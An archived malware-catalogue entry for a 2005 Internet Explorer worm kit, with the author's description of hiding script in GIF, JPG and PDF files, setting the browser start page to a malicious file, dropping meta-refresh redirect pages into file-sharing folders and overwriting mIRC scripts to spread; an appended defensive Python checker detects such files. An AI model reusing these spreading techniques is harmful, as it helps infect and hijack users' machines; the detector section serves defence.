.: IE Media Files worm kit :.
Released 16 years, 8 months ago. Dec 2005
By dav
Additional Details
- Coded by: dav
- Version: IE Media Files worm kit
- Released date: Dec 2005, 16 years, 8 months ago.
- Coded in: Delphi
- Family: IE Media Files worm kit
- Category: Remote Access
MegaSecurity Notes
tested on Windows XP February 17, 2007
Author Words
Intro

Sven Vetsch found a cross site scripting vulnerability in Microsoft Internet Explorer. It's possible to run arbitrary script code. The problem lies in the handling of the content of such files. In the first place the usual file header (e.g. GIF) is provided. The remaining content of the file could be usual HTML data -> + JavaScript/Visual Basic Script (VBS, ActiveX must be enabled!)

Worm Description

My w0rm defines a new IE start page. If the victim starts IE, IE will always load the w0rm.gif (on my webserver) -> w0rm start routine! Unfortunately the GIF bug only works when IE streams the GIF from a web server over HTTP or HTTPS! The malicious GIF can't be executed locally or included in other HTML pages. Therefore I had to write a new spreading technique. It makes no sense to drop a copy of the w0rm. So I decided that my w0rm creates HTML files on the victim machine with one meta tag line ->

w.WriteLine "<meta http-equiv='refresh' content='0;URL=" & url & "'>"

The idea is simple. Drop HTML files including a redirection to our webserver and spread these HTML files over file sharing folders (Kazaa, P2P) and IIS (if installed). Also my w0rm overwrites (if it exists) the mIRC script.ini with some new lines. Why no DCC spreading script? Simply because the chance is much higher that the w0rm infects more machines by sending the link across IRC instead of sending HTML files.

Malicious JPG, PDF, PNG, AVI, ...

It's possible to put/hide your w0rm in every file (jpg, gif, pdf, png, avi, ...). I tried it and it works! (all IE) Open your notepad and type:

<script type="text/javascript">alert("the vx scene never dies!")</script>

Save it as *.jpg, *.pdf, ... ;) It isn't necessary to write the usual file header (e.g. GIF) in the first place! Just put your JS/VBS c0de in such a file, upload and... :).

New Idea

I guess you noticed that my sample script is not exactly a real w0rm, but we could write a w0rm with the following features:
- the w0rm drops a copy of itself as jpg, gif, pdf, png, avi, ... and a binary version of a simple webserver in itself (with chr())
- spreading the host's IP over mail?/irc/im? -> e.g. "hey buddy look at this :D, --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--"

dav
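The two file tricks described above (a genuine GIF header followed by script, and a bare script saved under an image extension) plus the meta-refresh dropper, as an added defensive example that is not part of dav's kit or this archive: a Python checker that compares a file's magic bytes with its extension and flags browser markup in the content. All sample files are constructed inline.

```python
"""Heuristic check for media files that really carry HTML/script (added example)."""
import re

# Magic bytes for the formats the post names (AVI omitted: it is a RIFF container).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
}

# Markup a browser could act on if it sniffs the file as HTML.
SUSPICIOUS = re.compile(
    rb"<\s*(script|iframe|object|embed|html)\b"
    rb"|<\s*meta\s+http-equiv\s*=\s*['\"]?refresh"
    rb"|(?:javascript|vbscript)\s*:",
    re.IGNORECASE,
)

def inspect(name: str, data: bytes) -> dict:
    """Report whether the magic bytes match the extension and whether markup is present."""
    ext = name.rsplit(".", 1)[-1].lower()
    ext = {"jpeg": "jpg"}.get(ext, ext)
    header_ok = any(data.startswith(sig) for sig in MAGIC.get(ext, ()))
    match = SUSPICIOUS.search(data)
    return {
        "name": name,
        "header_ok": header_ok,           # True for the "GIF header first" variant
        "markup": match.group(0).decode("latin-1") if match else None,
        "suspicious": match is not None,  # flagged with or without a real header
    }

def scan(files: dict) -> list:
    """Names of files carrying markup a browser would act on (polyglot media or redirect droppers)."""
    return [n for n, d in files.items() if inspect(n, d)["suspicious"]]

# Constructed samples: header + script, bare script, clean image, meta-refresh dropper.
SAMPLES = {
    "w0rm.gif": b"GIF89a" + b"<script>alert('x')</script>",
    "photo.jpg": b'<script type="text/javascript">alert("x")</script>',
    "clean.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
    "drop.htm": b"<meta http-equiv='refresh' content='0;URL=http://example.invalid/'>",
}

if __name__ == "__main__":
    for n in scan(SAMPLES):
        print("FLAG", n, inspect(n, SAMPLES[n])["markup"])
```

On the server side, sending the correct Content-Type together with an X-Content-Type-Options: nosniff header stops current browsers from treating such uploads as HTML, which is the sniffing behaviour the post relies on.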
URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at sub7crew@protonmail.com, thank you in advance.